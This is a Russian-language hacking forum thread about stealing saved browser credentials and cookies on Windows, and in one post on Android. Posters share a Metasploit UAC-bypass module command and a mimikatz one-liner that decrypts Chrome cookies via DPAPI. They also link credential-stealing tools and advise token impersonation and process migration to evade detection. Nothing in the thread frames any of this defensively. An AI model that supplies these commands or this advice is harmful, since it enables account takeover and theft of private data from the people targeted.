![]() |
Не сработало =( Windows server 2012 R2 Build 9600
https://forum.antichat.xyz/attachmen...cf9bb888f6.png И так далее. Может еще в какой процесс мигрировать? |
Цитата:
Для того что бы получить такую сессию к примеру можно выполнить следующее: Код: Код:
use exploit/windows/local/bypassuac_eventvwr |
Цитата:
|
Цитата:
Это как командную строку запустить от имени администратора нужно, будучи администратором. |
от себя дополню)
https://github.com/pourquoibenoit/WinPirate грабит пассы от всего включая браузеры https://github.com/Marten4n6/EvilOSX.git грабит пасы chrome от огрызков OSX ну а вообще умеет тоже делать такие вещи Код: Код:
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit |
Цитата:
|
Цитата:
|
Цитата:
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю. [doublepost=1511950351,1511950029][/doublepost] Цитата:
|
миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)
|
Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере. Спасибо. |
| Время: 18:32 |